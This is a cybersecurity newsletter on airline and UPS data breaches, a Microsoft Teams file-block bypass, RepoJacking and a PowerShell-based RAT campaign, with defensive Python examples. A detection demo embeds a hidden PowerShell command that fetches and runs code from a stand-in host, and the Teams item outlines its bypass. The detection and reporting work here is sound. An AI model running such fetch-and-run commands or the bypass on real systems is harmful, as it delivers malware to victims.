Airlines disclose pilot data breach and the Microsoft Teams bug
Major airlines disclose a vendor breach exposing pilot data, a Microsoft Teams bug lets external users deliver malware, and RepoJacking threatens millions of GitHub repositories. Catch all this and more in this week's edition of Cybersecurity Weekly.
1. Southwest Airlines and American Airlines disclose vendor breach affecting pilots
American Airlines and Southwest Airlines recently disclosed data breaches stemming from an intrusion at Pilot Credentials, a third-party vendor that manages pilot applications. On April 30 an unauthorized party accessed the vendor's systems and took documents containing personal information of pilots and cadet applicants; American Airlines reported 5,745 affected individuals and Southwest Airlines 3,900. Both airlines have ended their relationship with the vendor and are cooperating with law enforcement.
2. Microsoft Teams vulnerability allows external users to inject malware
Security researchers at UK-based Jumpsec have shown a way to deliver malware through Microsoft Teams even when a tenant blocks files from external sources. Teams allows messaging with external tenant accounts by default; the researchers used that channel and, by swapping the internal and external recipient IDs in the message's POST request, bypassed the client-side control so that a payload landed in the target's inbox as an ordinary file. Microsoft was notified and said the issue did not meet its bar for immediate servicing. Because the control being bypassed is enforced in the client, the practical mitigation is administrative: tenants that do not need open federation can disable external access, or restrict it to an allow-list of partner domains, in the Teams admin center.
3. RepoJacking is a threat to millions of GitHub repositories
Aqua Security's Nautilus research team has shown how RepoJacking puts millions of GitHub repositories at risk. RepoJacking happens when a GitHub user or organization renames or deletes its account: old URLs keep redirecting to the new location, so dependencies, build scripts and documentation that still reference the old owner name continue to work, and an attacker who registers the now-free name can serve a repository that looks legitimate but is under their control. Anything that pulls code from the old path, such as a package manager, a CI pipeline or an install script, can end up executing attacker code on internal systems or in customer environments. In a sample of 1.25 million repositories the researchers found 2.95% vulnerable; extrapolated across GitHub's roughly 300 million repositories, that rate implies millions of exposed repositories (Aqua estimated more than 9 million).
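The check below is an added example, not Aqua's tooling or the newsletter's own code: it pulls owner/repo pairs out of dependency references, asks whether github.com redirects the old owner to a new one, and then whether the old owner name is still registered. The resolver and owner-lookup callables are injected so the demo runs offline against constructed state; `github_resolve` and `github_owner_exists` are the live versions and need network access. All account and repository names in the demo data are invented.

```python
"""RepoJacking candidate finder (added illustration, not Aqua's tool)."""
import re
import urllib.error
import urllib.request
from typing import Callable, Iterable, List, Optional, Tuple

# owner/repo from https://, git+https://, ssh (github.com:owner/repo.git)
# and go.mod style (github.com/owner/repo v1.2.3) references.
GITHUB_REPO_RE = re.compile(
    r"github\.com[/:]([A-Za-z0-9][A-Za-z0-9-]*)/([A-Za-z0-9_.-]+?)(?:\.git)?(?:[/#?@\s]|$)"
)

Repo = Tuple[str, str]


def parse_github_repo(ref: str) -> Optional[Repo]:
    """Return (owner, repo) for a reference pointing at github.com, else None."""
    m = GITHUB_REPO_RE.search(ref)
    return (m.group(1), m.group(2)) if m else None


def repojacking_candidates(
    refs: Iterable[str],
    resolve: Callable[[str, str], Optional[Repo]],
    owner_exists: Callable[[str], bool],
) -> List[Tuple[str, str, str, str]]:
    """Classify references whose owner has been renamed away.

    resolve(owner, repo) -> (final_owner, final_repo) after redirects, None on 404
    owner_exists(owner)  -> True if github.com/<owner> currently exists

    Returns (ref, old_owner, new_owner, status) where status is
      'hijackable'   the old owner name is unregistered; anyone can claim it
      'reregistered' someone already holds the old name; verify who
    """
    findings, seen = [], set()
    for ref in refs:
        parsed = parse_github_repo(ref)
        if parsed is None:
            continue
        owner, repo = parsed
        key = (owner.lower(), repo.lower())
        if key in seen:
            continue
        seen.add(key)
        target = resolve(owner, repo)
        # Gone entirely, or still under the same owner: not a redirect, not our case.
        if target is None or target[0].lower() == owner.lower():
            continue
        status = "reregistered" if owner_exists(owner) else "hijackable"
        findings.append((ref, owner, target[0], status))
    return findings


# Live resolvers (need network). urllib follows GitHub's redirect, so the
# final URL reveals the current owner.
def github_resolve(owner: str, repo: str) -> Optional[Repo]:
    try:
        with urllib.request.urlopen(f"https://github.com/{owner}/{repo}") as resp:
            return parse_github_repo(resp.geturl())
    except urllib.error.HTTPError as err:
        if err.code == 404:
            return None
        raise


def github_owner_exists(owner: str) -> bool:
    try:
        urllib.request.urlopen(f"https://github.com/{owner}").close()
        return True
    except urllib.error.HTTPError as err:
        if err.code == 404:
            return False
        raise


# Constructed demo input: a pip VCS pin, a tarball URL, a go.mod line, a plain link.
DEMO_REFS = [
    "git+https://github.com/oldcorp/widget-lib.git@v2.1.0",
    "https://github.com/stablecorp/tool/archive/v1.tar.gz",
    "github.com/renamed-dev/cli v0.9.0",
    "https://github.com/gone-org/missing",
]

# Constructed fake GitHub state standing in for the live resolvers.
FAKE_REDIRECTS = {
    ("oldcorp", "widget-lib"): ("newcorp", "widget-lib"),  # renamed, old name free
    ("stablecorp", "tool"): ("stablecorp", "tool"),        # never renamed
    ("renamed-dev", "cli"): ("renamed-dev-ltd", "cli"),    # renamed, old name re-taken
}
FAKE_OWNERS = {"newcorp", "stablecorp", "renamed-dev-ltd", "renamed-dev"}


def fake_resolve(owner: str, repo: str) -> Optional[Repo]:
    return FAKE_REDIRECTS.get((owner, repo))


def fake_owner_exists(owner: str) -> bool:
    return owner in FAKE_OWNERS


if __name__ == "__main__":
    for ref, old, new, status in repojacking_candidates(DEMO_REFS, fake_resolve, fake_owner_exists):
        print(f"{status:13} {old} -> {new}   {ref}")
```

GitHub retires the namespace of sufficiently popular repositories when their owner renames, so not every "hijackable" finding can actually be claimed; the reference should still be repointed at the current owner, because the redirect is the only thing keeping it alive. A "reregistered" finding deserves a manual look at who now holds the old name.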
4. New MULTI#STORM RAT campaign aims for India and the U.S.
A sophisticated phishing campaign tracked as MULTI#STORM is targeting the U.S. and India, using JavaScript files to deliver remote access trojans (RATs). The chain is multi-stage: the victim clicks a link embedded in an email and is taken to a password-protected ZIP file hosted on Microsoft OneDrive; the extracted JavaScript file runs PowerShell commands that fetch and execute further payloads, including a Python-based executable acting as a dropper; the final stage deploys Warzone RAT, which can harvest sensitive data and download additional malware. Users are advised to be wary of unexpected emails, especially those pressing for urgent action, and defenders should watch for script hosts spawning PowerShell and for PowerShell launching executables from user-writable directories.
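As an added example (not the newsletter's or any vendor's published detection content), the triage below runs over process-creation records for the stages the chain above exposes on an endpoint: a script host (wscript.exe or cscript.exe) spawning PowerShell, a PowerShell download cradle, hidden or encoded PowerShell, and PowerShell launching a binary from a staging directory. The record layout is assumed to be a Sysmon event ID 1 or EDR export flattened into dicts with `id`, `parent_image`, `image` and `cmdline`; the events at the bottom are constructed for the demo.

```python
"""Process-creation triage for a JavaScript -> PowerShell -> dropper chain."""
import ntpath
from typing import Dict, List, Tuple

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
DOWNLOAD_CUES = ("downloadstring", "downloadfile", "invoke-webrequest",
                 "net.webclient", "start-bitstransfer", "frombase64string")
HIDDEN_CUES = ("-w hidden", "-windowstyle hidden", "-enc ", "-encodedcommand")
# User-writable locations a dropper is typically written to and run from.
STAGING_DIRS = ("\\appdata\\local\\temp\\", "\\users\\public\\", "\\programdata\\")


def _basename(path: str) -> str:
    # ntpath handles Windows paths regardless of the platform the triage runs on.
    return ntpath.basename(path).lower()


def triage_event(ev: Dict[str, str]) -> List[str]:
    """Return the rule names an event trips; an empty list means nothing matched."""
    reasons = []
    image, parent = _basename(ev["image"]), _basename(ev["parent_image"])
    cmd = ev.get("cmdline", "").lower()
    if parent in SCRIPT_HOSTS and image in POWERSHELL:
        reasons.append("script-host-spawned-powershell")
    if image in POWERSHELL and any(c in cmd for c in DOWNLOAD_CUES):
        reasons.append("powershell-download-cradle")
    if image in POWERSHELL and any(c in cmd for c in HIDDEN_CUES):
        reasons.append("powershell-hidden-or-encoded")
    if parent in POWERSHELL and any(d in ev["image"].lower() for d in STAGING_DIRS):
        reasons.append("powershell-launched-staged-binary")
    return reasons


def triage(events: List[Dict[str, str]]) -> List[Tuple[str, List[str]]]:
    """Return (event_id, reasons) for events that trip a rule, most rules first."""
    hits = [(ev["id"], triage_event(ev)) for ev in events]
    hits = [(i, r) for i, r in hits if r]
    hits.sort(key=lambda h: -len(h[1]))
    return hits


# Constructed sample events: e1 and e3 mimic the chain, e2 and e4 are benign noise.
DEMO_EVENTS = [
    {"id": "e1",
     "parent_image": "C:\\Windows\\System32\\wscript.exe",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell.exe -w hidden -c \"IEX (New-Object Net.WebClient)"
                ".DownloadString('https://example.invalid/stage2')\""},
    {"id": "e2",
     "parent_image": "C:\\Windows\\explorer.exe",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell.exe Get-ChildItem C:\\Users\\alice\\Documents"},
    {"id": "e3",
     "parent_image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "image": "C:\\Users\\alice\\AppData\\Local\\Temp\\svc_update.exe",
     "cmdline": "C:\\Users\\alice\\AppData\\Local\\Temp\\svc_update.exe"},
    {"id": "e4",
     "parent_image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE",
     "image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE",
     "cmdline": "\"C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE\" /dde"},
]

if __name__ == "__main__":
    for event_id, reasons in triage(DEMO_EVENTS):
        print(event_id, ", ".join(reasons))
```

Each rule on its own is noisy in some environments (administrators run encoded PowerShell, installers drop into ProgramData), which is why the output ranks events by how many rules they trip; the script-host-to-PowerShell parent relationship is the one that is rarely legitimate and is worth alerting on alone.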
5. UPS confirms data breach after hackers use customer data for SMS phishing
UPS has sent a data breach notification to customers, revealing that personal information may have been harvested through its package look-up tools and then used in SMS phishing. Between February 2022 and April 2023, attackers queried the tools to pull recipient details, including names, addresses and possibly order numbers and phone numbers, and then sent fraudulent text messages, posing as legitimate companies, demanding a payment to release the delivery. UPS is working with law enforcement and partners to address the situation.